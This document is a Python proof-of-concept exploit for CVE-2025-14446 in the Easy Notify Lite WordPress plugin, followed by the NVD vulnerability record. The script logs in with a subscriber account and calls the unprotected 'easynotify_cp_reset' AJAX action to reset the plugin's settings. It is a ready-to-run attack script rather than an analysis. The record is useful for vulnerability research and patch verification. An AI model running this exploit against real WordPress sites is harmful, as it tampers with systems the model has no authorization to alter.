CVE-2025-14446

import requests import sys # WordPress Easy Notify Lite Plugin < 1.1.38 - Authorization Bypass PoC # CVE-2025-14446 target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" username = sys.argv[2] if len(sys.argv) > 2 else "subscriber_user" password = sys.argv[3] if len(sys.argv) > 3 else "password123" session = requests.Session() # Step 1: Login to WordPress with subscriber account login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } response = session.post(login_url, data=login_data) if "wordpress_logged_in" in str(session.cookies) or response.status_code == 200: print("[+] Successfully logged in as subscriber") # Step 2: Trigger the reset function via AJAX or direct function call # The easynotify_cp_reset() function lacks capability check reset_url = f"{target_url}/wp-admin/admin-ajax.php" reset_data = { "action": "easynotify_cp_reset", # AJAX action hook "security": "" # Some versions may require nonce } response = session.post(reset_url, data=reset_data) if response.status_code == 200: print("[+] Plugin settings reset successfully!") print("[+] The Easy Notify Lite plugin settings have been reset to defaults") else: print("[-] Reset request failed") else: print("[-] Login failed")

{"cve": {"id": "CVE-2025-14446", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:49.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Popup Builder (Easy Notify Lite) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the easynotify_cp_reset() function in all versions up to, and including, 1.1.37. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset plugin settings to their default values."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-notify-lite/tags/1.1.37/inc/functions/enoty-functions.php#L304", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-notify-lite/trunk/inc/functions/enoty-functions.php#L304", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3418678/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f67ab0cf-340d-4234-a857-1883f91c3ab6?source=cve", "source": "[email protected]"}]}}